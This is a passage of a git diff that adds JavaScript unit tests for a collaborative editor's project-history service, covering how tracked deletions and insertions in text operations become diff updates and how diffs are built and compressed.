+ this.projectId, + this.chunk, + 'main.tex', + 0, + 1, + (error, diff) => { + expect(error).to.be.null + expect(diff.initialContent).to.equal('Hello world, this is a test') + expect(diff.updates).to.deep.equal([ + { + op: [ + { i: 'the', p: 21 }, + { d: 'a', p: 24 }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + ]) + done() + } + ) + }) + + it('should filter out tracked deletes across multiple changes', function (done) { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + rangesHash: this.rangesHash, + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'main.tex', + textOperation: [ + // [...] is a tracked delete + 28, // Hello [planet ]world, this is |a test + -1, // Hello [planet ]world, this is | test + 'the', // Hello [planet ]world, this is the| test + 5, // Hello [planet ]world, this is the test| + ], + }, + { + pathname: 'main.tex', + textOperation: [ + // [...] is a tracked delete + 22, // Hello [planet ]world, th|is is the test + -2, // Hello [planet ]world, th| is the test + 'at', // Hello [planet ]world, that| is the test + 12, // Hello [planet ]world, that is the test| + ], + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + ], + }, + }, + authors: [this.author1.id], + } + + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 0, + 1, + (error, diff) => { + expect(error).to.be.null + expect(diff.initialContent).to.equal('Hello world, this is a test') + expect(diff.updates).to.deep.equal([ + { + op: [ + { i: 'the', p: 21 }, + { d: 'a', p: 24 }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + { + op: [ + { i: 'at', p: 15 }, + { d: 'is', p: 17 }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + ]) + done() + } + ) + }) + + it('should handle tracked delete in the operation', function (done) { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + rangesHash: this.rangesHash, + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'main.tex', + textOperation: [ + // [...] is a tracked delete + 5, // Hello| [planet ]world, this is a test + { + r: 1, + tracking: { + type: 'delete', + userId: this.author1.id, + ts: '2024-01-01T00:00:00.000Z', + }, + }, // Hello[ ]|[planet ]world, this is test + 7, // Hello[ ][planet ]|world, this is the test + { + r: 5, + tracking: { + type: 'delete', + userId: this.author1.id, + ts: '2024-01-01T00:00:00.000Z', + }, + }, // Hello[ ][planet ][world]|, this is the test + 18, // Hello[ ][planet ][world], this is the test| + ], + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + ], + }, + }, + authors: [this.author1.id], + } + + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 0, + 1, + (error, diff) => { + expect(error).to.be.null + expect(diff.initialContent).to.equal('Hello world, this is a test') + expect(diff.updates).to.deep.equal([ + { + op: [ + { d: ' ', p: 5 }, + { d: 'world', p: 5 }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + ]) + done() + } + ) + }) + + it('should filter out tracked deletes in insert operations', function (done) { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + rangesHash: this.rangesHash, + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'main.tex', + textOperation: [ + // [...] is a tracked delete + 13, // Hello [planet ]|world, this is a test + { + i: 'pluto', + tracking: { + type: 'delete', + userId: this.author1.id, + ts: '2024-01-01T00:00:00.000Z', + }, + }, // Hello [planet pluto]|world, this is a test + 21, // Hello [planet pluto]world, this is a test| + ], + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + ], + }, + }, + authors: [this.author1.id], + } + + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 0, + 1, + (error, diff) => { + expect(error).to.be.null + expect(diff.initialContent).to.equal('Hello world, this is a test') + expect(diff.updates).to.deep.equal([ + { + op: [], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + ]) + done() + } + ) + }) + + it('should filter out tracked deletes in delete operations', function (done) { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + rangesHash: this.rangesHash, + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'main.tex', + textOperation: [ + // [...] is a tracked delete + 6, // Hello |[planet ]world, this is a test + -3, // Hello [|net ]world, this is a test + 6, // Hello [net ]wo|rld, this is a test + -3, // Hello [net ]wo|, this is a test + 16, // Hello [net ]wo, this is a test| + ], + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + ], + }, + }, + authors: [this.author1.id], + } + + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 0, + 1, + (error, diff) => { + expect(error).to.be.null + expect(diff.initialContent).to.equal('Hello world, this is a test') + expect(diff.updates).to.deep.equal([ + { + op: [{ d: 'rld', p: 8 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + ]) + done() + } + ) + }) + + it('should filter out tracked deletes in retain operations', function (done) { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + rangesHash: this.rangesHash, + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'main.tex', + textOperation: [ + // [...] is a tracked delete + 4, // Hell|o [planet ]world, this is a test + { + r: 4, + tracking: { type: 'none' }, + }, // Hello pl|[anet ]world, this is a test + { + r: 3, + tracking: { + type: 'insert', + userId: this.author1.id, + ts: '2024-01-01T00:00:00.000Z', + }, + }, // Hello plane|[t ]world, this is a test + 23, // Hello plane[t ]world, this is a test| + ], + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + ], + }, + }, + authors: [this.author1.id], + } + + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 0, + 1, + (error, diff) => { + expect(error).to.be.null + expect(diff.initialContent).to.equal('Hello world, this is a test') + expect(diff.updates).to.deep.equal([ + { + op: [ + { + i: 'pl', + p: 6, + }, + { + i: 'ane', + p: 8, + }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + ]) + done() + } + ) + }) + + it('should report tracked deletion (retains) as deletions', function (done) { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + rangesHash: this.rangesHash, + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'main.tex', + textOperation: [ + // [...] is a tracked delete + { + r: 34, + tracking: { + type: 'delete', + userId: this.author1.id, + ts: '2024-01-01T00:00:00.000Z', + }, + }, // [Hello planet world, this is a test]| + ], + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + ], + }, + }, + authors: [this.author1.id], + } + + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 0, + 1, + (error, diff) => { + expect(error).to.be.null + expect(diff.initialContent).to.equal('Hello world, this is a test') + expect(diff.updates).to.deep.equal([ + { + op: [ + { + d: 'Hello ', + p: 0, + }, + { + d: 'world, this is a test', + p: 0, + }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + ]) + done() + } + ) + }) + + it('should properly create changes when deleting after moved track deletes', function (done) { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + stringLength: 34, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'main.tex', + textOperation: [ + // [...] is a tracked delete + // // He[ll]o planet world, this is a test + 2, + { + r: 2, + tracking: { + type: 'delete', + userId: this.author1.id, + ts: this.date.toISOString(), + }, + }, + 30, + ], + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [ + { + pathname: 'main.tex', + textOperation: [ + // [...] is a tracked delete + // {...} is a tracked insert + // He[ll]o {TEST }planet world, this is a test + 6, + { + i: 'TEST ', + tracking: { + type: 'insert', + userId: this.author1.id, + ts: this.date.toISOString(), + }, + }, + 28, + ], + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [ + { + pathname: 'main.tex', + textOperation: [ + // [...] is a tracked delete + // {...} is a tracked insert + // He[ll]o {TEST }planet world, [this] is a test + 25, + { + r: 4, + tracking: { + type: 'delete', + userId: this.author1.id, + ts: this.date.toISOString(), + }, + }, + 10, + ], + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [ + { + pathname: 'main.tex', + textOperation: [ + // [...] is a tracked delete + // {...} is a tracked insert + 2, // He|[ll]o {TEST }planet world, [this] is a test + -2, // He|o {TEST }planet world, [this] is a test + 2, // Heo |{TEST }planet world, [this] is a test + { + r: 5, + tracking: { type: 'none' }, + }, // Heo TEST| planet world, [this] is a test + 14, // Heo TEST planet world, |[this] is a test + -4, // Heo TEST planet world, | is a test + 10, // Heo TEST planet world, is a test| + ], + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + ], + }, + }, + authors: [this.author1.id], + } + + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 0, + 4, + (error, diff) => { + expect(error).to.be.null + expect(diff.updates).to.deep.equal([ + { + op: [ + { + d: 'll', + p: 2, + }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + { + op: [ + { + i: 'TEST ', + p: 4, + }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 1, + }, + { + op: [ + { + d: 'this', + p: 23, + }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 2, + }, + { + op: [], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 3, + }, + ]) + done() + } + ) + }) + + it('should properly create changes when retaining after moved track deletes', function (done) { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + stringLength: 34, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'main.tex', + textOperation: [ + // [...] is a tracked delete + // // He[ll]o planet world, this is a test + 2, + { + r: 2, + tracking: { + type: 'delete', + userId: this.author1.id, + ts: this.date.toISOString(), + }, + }, + 30, + ], + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [ + { + pathname: 'main.tex', + textOperation: [ + // [...] is a tracked delete + // He[ll]o planet world, [this] is a test + 20, + { + r: 4, + tracking: { + type: 'delete', + userId: this.author1.id, + ts: this.date.toISOString(), + }, + }, + 10, + ], + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [ + { + pathname: 'main.tex', + textOperation: [ + // [...] is a tracked delete + // {...} is a tracked insert + // He[ll]o planet world, [this] {TEST }is a test + 25, + { + i: 'TEST ', + tracking: { + type: 'insert', + userId: this.author1.id, + ts: this.date.toISOString(), + }, + }, + 9, + ], + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [ + { + pathname: 'main.tex', + textOperation: [ + // [...] is a tracked delete + // {...} is a tracked insert + 2, // He|[ll]o planet world, [this] {TEST }is a test + -2, // He|o planet world, [this] {TEST }is a test + { + r: 39, + tracking: { type: 'none' }, + }, + ], // He|o planet world, this TEST is a test + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + ], + }, + }, + authors: [this.author1.id], + } + + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 0, + 4, + (error, diff) => { + expect(error).to.be.null + expect(diff.updates).to.deep.equal([ + { + op: [ + { + d: 'll', + p: 2, + }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + { + op: [ + { + d: 'this', + p: 18, + }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 1, + }, + { + op: [ + { + i: 'TEST ', + p: 19, + }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 2, + }, + { + op: [ + { + i: 'this', + p: 18, + }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 3, + }, + ]) + done() + } + ) + }) + + it('should handle deletion that starts before tracked delete', function (done) { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + stringLength: 34, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'main.tex', + textOperation: [ + // [...] is a tracked delete + // Hello planet world, [this] is a test + 20, + { + r: 4, + tracking: { + type: 'delete', + userId: this.author1.id, + ts: this.date.toISOString(), + }, + }, + 10, + ], + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [ + { + pathname: 'main.tex', + textOperation: [ + // [...] is a tracked delete + 5, // Hello| planet world, [this] is a test + -25, // Hellotest + 4, + ], + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + ], + }, + }, + authors: [this.author1.id], + } + + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 0, + 2, + (error, diff) => { + expect(error).to.be.null + expect(diff.updates).to.deep.equal([ + { + op: [ + { + d: 'this', + p: 20, + }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + { + op: [ + { + d: ' planet world, ', + p: 5, + }, + { + d: ' is a ', + p: 5, + }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 1, + }, + ]) + done() + } + ) + }) + + describe('whith multiple tracked deletes', function () { + beforeEach(function () { + this.fileContents = 'Hello planet world universe, this is a test' + this.ranges = JSON.stringify({ + trackedChanges: [ + { + range: { pos: 6, length: 7 }, + tracking: { + type: 'delete', + userId: this.author1.id, + ts: '2024-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 18, length: 9 }, + tracking: { + type: 'delete', + userId: this.author1.id, + ts: '2024-01-01T00:00:00.000Z', + }, + }, + ], + }) + this.HistoryStoreManager.getProjectBlob + .withArgs(this.historyId, this.rangesHash) + .yields(null, this.ranges) + this.HistoryStoreManager.getProjectBlob + .withArgs(this.historyId, this.fileHash) + .yields(null, this.fileContents) + }) + + it('should handle a deletion that spans multiple tracked deletes', function (done) { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + rangesHash: this.rangesHash, + stringLength: this.fileContents.length, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'main.tex', + textOperation: [ + // [...] is a tracked delete + 6, // Hello |[planet ]world[ universe], this is a test + -21, // Hello|, this is a test + 16, + ], + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + ], + }, + }, + authors: [this.author1.id], + } + + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 0, + 1, + (error, diff) => { + expect(error).to.be.null + expect(diff.updates).to.deep.equal([ + { + op: [ + { + d: 'world', + p: 6, + }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + ]) + done() + } + ) + }) + + it('should handle a tracked deletion that spans multiple tracked deletes', function (done) { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + rangesHash: this.rangesHash, + stringLength: this.fileContents.length, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'main.tex', + textOperation: [ + // [...] is a tracked delete + 6, // Hello |[planet ]world[ universe], this is a test + { + r: 21, + tracking: { + type: 'delete', + userId: this.author1.id, + ts: '2024-01-01T00:00:00.000Z', + }, + }, // Hello [planet world universe]|, this is a test + 16, + ], + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + ], + }, + }, + authors: [this.author1.id], + } + + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 0, + 1, + (error, diff) => { + expect(error).to.be.null + expect(diff.updates).to.deep.equal([ + { + op: [ + { + d: 'world', + p: 6, + }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + ]) + done() + } + ) + }) + }) + }) + }) +}) diff --git a/services/project-history/test/unit/js/DiffGenerator/DiffGeneratorTests.js b/services/project-history/test/unit/js/DiffGenerator/DiffGeneratorTests.js new file mode 100644 index 0000000..251ddb3 --- /dev/null +++ b/services/project-history/test/unit/js/DiffGenerator/DiffGeneratorTests.js @@ -0,0 +1,395 @@ +import sinon from 'sinon' +import { expect } from 'chai' +import { strict as esmock } from 'esmock' + +const MODULE_PATH = '../../../../app/js/DiffGenerator.js' + +describe('DiffGenerator', function () { + beforeEach(async function () { + this.DiffGenerator = await esmock(MODULE_PATH, {}) + this.ts = Date.now() + this.user_id = 'mock-user-id' + this.user_id_2 = 'mock-user-id-2' + this.meta = { + start_ts: this.ts, + end_ts: this.ts, + user_id: this.user_id, + } + }) + + describe('buildDiff', function () { + beforeEach(function () { + this.diff = [{ u: 'mock-diff' }] + this.content = 'Hello world' + this.updates = [ + { i: 'mock-update-1' }, + { i: 'mock-update-2' }, + { i: 'mock-update-3' }, + ] + this.DiffGenerator._mocks.applyUpdateToDiff = sinon + .stub() + .returns(this.diff) + this.DiffGenerator._mocks.compressDiff = sinon.stub().returns(this.diff) + this.result = this.DiffGenerator.buildDiff(this.content, this.updates) + }) + + it('should return the diff', function () { + this.result.should.deep.equal(this.diff) + }) + + it('should build the content into an initial diff', function () { + this.DiffGenerator._mocks.applyUpdateToDiff + .calledWith( + [ + { + u: this.content, + }, + ], + this.updates[0] + ) + .should.equal(true) + }) + + it('should apply each update', function () { + this.updates.map(update => + this.DiffGenerator._mocks.applyUpdateToDiff + .calledWith(sinon.match.any, update) + .should.equal(true) + ) + }) + + it('should compress the diff', function () { + this.DiffGenerator._mocks.compressDiff + .calledWith(this.diff) + .should.equal(true) + }) + }) + + describe('compressDiff', function () { + describe('with adjacent inserts with the same user id', function () { + it('should create one update with combined meta data and min/max timestamps', function () { + const diff = this.DiffGenerator.compressDiff([ + { + i: 'foo', + meta: { start_ts: 10, end_ts: 20, users: [this.user_id] }, + }, + { + i: 'bar', + meta: { start_ts: 5, end_ts: 15, users: [this.user_id] }, + }, + ]) + expect(diff).to.deep.equal([ + { + i: 'foobar', + meta: { start_ts: 5, end_ts: 20, users: [this.user_id] }, + }, + ]) + }) + }) + + describe('with adjacent inserts with different user ids', function () { + it('should leave the inserts unchanged', function () { + const input = [ + { + i: 'foo', + meta: { start_ts: 10, end_ts: 20, users: [this.user_id] }, + }, + { + i: 'bar', + meta: { start_ts: 5, end_ts: 15, users: [this.user_id_2] }, + }, + ] + const output = this.DiffGenerator.compressDiff(input) + expect(output).to.deep.equal(input) + }) + }) + + describe('with adjacent deletes with the same user id', function () { + it('should create one update with combined meta data and min/max timestamps', function () { + const diff = this.DiffGenerator.compressDiff([ + { + d: 'foo', + meta: { start_ts: 10, end_ts: 20, users: [this.user_id] }, + }, + { + d: 'bar', + meta: { start_ts: 5, end_ts: 15, users: [this.user_id] }, + }, + ]) + expect(diff).to.deep.equal([ + { + d: 'foobar', + meta: { start_ts: 5, end_ts: 20, users: [this.user_id] }, + }, + ]) + }) + }) + + describe('with adjacent deletes with different user ids', function () { + it('should leave the deletes unchanged', function () { + const input = [ + { + d: 'foo', + meta: { start_ts: 10, end_ts: 20, users: [this.user_id] }, + }, + { + d: 'bar', + meta: { start_ts: 5, end_ts: 15, users: [this.user_id_2] }, + }, + ] + const output = this.DiffGenerator.compressDiff(input) + expect(output).to.deep.equal(input) + }) + }) + + describe('with history resync updates', function () { + it('should keep only inserts and mark them as unchanged text', function () { + const input = [ + { u: 'untracked text' }, + { + i: 'inserted anonymously', + meta: { origin: { kind: 'history-resync' } }, + }, + { + d: 'deleted anonymously', + meta: { origin: { kind: 'history-resync' } }, + }, + ] + const output = this.DiffGenerator.compressDiff(input) + expect(output).to.deep.equal([ + { u: 'untracked text' }, + { u: 'inserted anonymously' }, + ]) + }) + }) + }) + + describe('applyUpdateToDiff', function () { + describe('an insert', function () { + it('should insert into the middle of (u)nchanged text', function () { + const diff = this.DiffGenerator.applyUpdateToDiff([{ u: 'foobar' }], { + op: [{ p: 3, i: 'baz' }], + meta: this.meta, + }) + expect(diff).to.deep.equal([ + { u: 'foo' }, + { i: 'baz', meta: this.meta }, + { u: 'bar' }, + ]) + }) + + it('should insert into the start of (u)changed text', function () { + const diff = this.DiffGenerator.applyUpdateToDiff([{ u: 'foobar' }], { + op: [{ p: 0, i: 'baz' }], + meta: this.meta, + }) + expect(diff).to.deep.equal([ + { i: 'baz', meta: this.meta }, + { u: 'foobar' }, + ]) + }) + + it('should insert into the end of (u)changed text', function () { + const diff = this.DiffGenerator.applyUpdateToDiff([{ u: 'foobar' }], { + op: [{ p: 6, i: 'baz' }], + meta: this.meta, + }) + expect(diff).to.deep.equal([ + { u: 'foobar' }, + { i: 'baz', meta: this.meta }, + ]) + }) + + it('should insert into the middle of (i)inserted text', function () { + const diff = this.DiffGenerator.applyUpdateToDiff( + [{ i: 'foobar', meta: this.meta }], + { op: [{ p: 3, i: 'baz' }], meta: this.meta } + ) + expect(diff).to.deep.equal([ + { i: 'foo', meta: this.meta }, + { i: 'baz', meta: this.meta }, + { i: 'bar', meta: this.meta }, + ]) + }) + + it('should not count deletes in the running length total', function () { + const diff = this.DiffGenerator.applyUpdateToDiff( + [{ d: 'deleted', meta: this.meta }, { u: 'foobar' }], + { op: [{ p: 3, i: 'baz' }], meta: this.meta } + ) + expect(diff).to.deep.equal([ + { d: 'deleted', meta: this.meta }, + { u: 'foo' }, + { i: 'baz', meta: this.meta }, + { u: 'bar' }, + ]) + }) + }) + + describe('a delete', function () { + describe('deleting unchanged text', function () { + it('should delete from the middle of (u)nchanged text', function () { + const diff = this.DiffGenerator.applyUpdateToDiff( + [{ u: 'foobazbar' }], + { op: [{ p: 3, d: 'baz' }], meta: this.meta } + ) + expect(diff).to.deep.equal([ + { u: 'foo' }, + { d: 'baz', meta: this.meta }, + { u: 'bar' }, + ]) + }) + + it('should delete from the start of (u)nchanged text', function () { + const diff = this.DiffGenerator.applyUpdateToDiff( + [{ u: 'foobazbar' }], + { op: [{ p: 0, d: 'foo' }], meta: this.meta } + ) + expect(diff).to.deep.equal([ + { d: 'foo', meta: this.meta }, + { u: 'bazbar' }, + ]) + }) + + it('should delete from the end of (u)nchanged text', function () { + const diff = this.DiffGenerator.applyUpdateToDiff( + [{ u: 'foobazbar' }], + { op: [{ p: 6, d: 'bar' }], meta: this.meta } + ) + expect(diff).to.deep.equal([ + { u: 'foobaz' }, + { d: 'bar', meta: this.meta }, + ]) + }) + + it('should delete across multiple (u)changed text parts', function () { + const diff = this.DiffGenerator.applyUpdateToDiff( + [{ u: 'foo' }, { u: 'baz' }, { u: 'bar' }], + { op: [{ p: 2, d: 'obazb' }], meta: this.meta } + ) + expect(diff).to.deep.equal([ + { u: 'fo' }, + { d: 'o', meta: this.meta }, + { d: 'baz', meta: this.meta }, + { d: 'b', meta: this.meta }, + { u: 'ar' }, + ]) + }) + }) + + describe('deleting inserts', function () { + it('should delete from the middle of (i)nserted text', function () { + const diff = this.DiffGenerator.applyUpdateToDiff( + [{ i: 'foobazbar', meta: this.meta }], + { op: [{ p: 3, d: 'baz' }], meta: this.meta } + ) + expect(diff).to.deep.equal([ + { i: 'foo', meta: this.meta }, + { i: 'bar', meta: this.meta }, + ]) + }) + + it('should delete from the start of (u)nchanged text', function () { + const diff = this.DiffGenerator.applyUpdateToDiff( + [{ i: 'foobazbar', meta: this.meta }], + { op: [{ p: 0, d: 'foo' }], meta: this.meta } + ) + expect(diff).to.deep.equal([{ i: 'bazbar', meta: this.meta }]) + }) + + it('should delete from the end of (u)nchanged text', function () { + const diff = this.DiffGenerator.applyUpdateToDiff( + [{ i: 'foobazbar', meta: this.meta }], + { op: [{ p: 6, d: 'bar' }], meta: this.meta } + ) + expect(diff).to.deep.equal([{ i: 'foobaz', meta: this.meta }]) + }) + + it('should delete across multiple (u)changed and (i)nserted text parts', function () { + const diff = this.DiffGenerator.applyUpdateToDiff( + [{ u: 'foo' }, { i: 'baz', meta: this.meta }, { u: 'bar' }], + { op: [{ p: 2, d: 'obazb' }], meta: this.meta } + ) + expect(diff).to.deep.equal([ + { u: 'fo' }, + { d: 'o', meta: this.meta }, + { d: 'b', meta: this.meta }, + { u: 'ar' }, + ]) + }) + }) + + describe('deleting over existing deletes', function () { + it('should delete across multiple (u)changed and (d)deleted text parts', function () { + const diff = this.DiffGenerator.applyUpdateToDiff( + [{ u: 'foo' }, { d: 'baz', meta: this.meta }, { u: 'bar' }], + { op: [{ p: 2, d: 'ob' }], meta: this.meta } + ) + expect(diff).to.deep.equal([ + { u: 'fo' }, + { d: 'o', meta: this.meta }, + { d: 'baz', meta: this.meta }, + { d: 'b', meta: this.meta }, + { u: 'ar' }, + ]) + }) + }) + + describe("deleting when the text doesn't match", function () { + it('should throw an error when deleting from the middle of (u)nchanged text', function () { + expect(() => + this.DiffGenerator.applyUpdateToDiff([{ u: 'foobazbar' }], { + op: [{ p: 3, d: 'xxx' }], + meta: this.meta, + }) + ).to.throw(this.DiffGenerator.ConsistencyError) + }) + + it('should throw an error when deleting from the start of (u)nchanged text', function () { + expect(() => + this.DiffGenerator.applyUpdateToDiff([{ u: 'foobazbar' }], { + op: [{ p: 0, d: 'xxx' }], + meta: this.meta, + }) + ).to.throw(this.DiffGenerator.ConsistencyError) + }) + + it('should throw an error when deleting from the end of (u)nchanged text', function () { + expect(() => + this.DiffGenerator.applyUpdateToDiff([{ u: 'foobazbar' }], { + op: [{ p: 6, d: 'xxx' }], + meta: this.meta, + }) + ).to.throw(this.DiffGenerator.ConsistencyError) + }) + }) + + describe('when the last update in the existing diff is a delete', function () { + it('should insert the new update before the delete', function () { + const diff = this.DiffGenerator.applyUpdateToDiff( + [{ u: 'foo' }, { d: 'bar', meta: this.meta }], + { op: [{ p: 3, i: 'baz' }], meta: this.meta } + ) + expect(diff).to.deep.equal([ + { u: 'foo' }, + { i: 'baz', meta: this.meta }, + { d: 'bar', meta: this.meta }, + ]) + }) + }) + + describe('when the only update in the existing diff is a delete', function () { + it('should insert the new update after the delete', function () { + const diff = this.DiffGenerator.applyUpdateToDiff( + [{ d: 'bar', meta: this.meta }], + { op: [{ p: 0, i: 'baz' }], meta: this.meta } + ) + expect(diff).to.deep.equal([ + { d: 'bar', meta: this.meta }, + { i: 'baz', meta: this.meta }, + ]) + }) + }) + }) + }) +}) diff --git a/services/project-history/test/unit/js/DiffManager/DiffManagerTests.js b/services/project-history/test/unit/js/DiffManager/DiffManagerTests.js new file mode 100644 index 0000000..ba2c155 --- /dev/null +++ b/services/project-history/test/unit/js/DiffManager/DiffManagerTests.js @@ -0,0 +1,523 @@ +import sinon from 'sinon' +import { expect } from 'chai' +import { strict as esmock } from 'esmock' + +const MODULE_PATH = '../../../../app/js/DiffManager.js' + +describe('DiffManager', function () { + beforeEach(async function () { + this.DocumentUpdaterManager = {} + this.DiffGenerator = { + buildDiff: sinon.stub(), + } + this.UpdatesProcessor = { + processUpdatesForProject: sinon.stub(), + } + this.HistoryStoreManager = { + getChunkAtVersion: sinon.stub(), + } + this.WebApiManager = { + getHistoryId: sinon.stub(), + } + this.ChunkTranslator = { + convertToDiffUpdates: sinon.stub(), + } + this.FileTreeDiffGenerator = {} + this.DiffManager = await esmock(MODULE_PATH, { + '../../../../app/js/DocumentUpdaterManager.js': + this.DocumentUpdaterManager, + '../../../../app/js/DiffGenerator.js': this.DiffGenerator, + '../../../../app/js/UpdatesProcessor.js': this.UpdatesProcessor, + '../../../../app/js/HistoryStoreManager.js': this.HistoryStoreManager, + '../../../../app/js/WebApiManager.js': this.WebApiManager, + '../../../../app/js/ChunkTranslator.js': this.ChunkTranslator, + '../../../../app/js/FileTreeDiffGenerator.js': this.FileTreeDiffGenerator, + }) + this.projectId = 'mock-project-id' + this.callback = sinon.stub() + }) + + describe('getDiff', function () { + beforeEach(function () { + this.pathname = 'main.tex' + this.fromVersion = 4 + this.toVersion = 8 + this.initialContent = 'foo bar baz' + this.updates = ['mock-updates'] + this.diff = { mock: 'dif' } + this.UpdatesProcessor.processUpdatesForProject + .withArgs(this.projectId) + .yields() + this.DiffGenerator.buildDiff + .withArgs(this.initialContent, this.updates) + .returns(this.diff) + }) + + describe('with a text file', function () { + beforeEach(function () { + this.DiffManager._mocks._getProjectUpdatesBetweenVersions = sinon.stub() + this.DiffManager._mocks._getProjectUpdatesBetweenVersions + .withArgs( + this.projectId, + this.pathname, + this.fromVersion, + this.toVersion + ) + .yields(null, { + initialContent: this.initialContent, + updates: this.updates, + }) + this.DiffManager.getDiff( + this.projectId, + this.pathname, + this.fromVersion, + this.toVersion, + 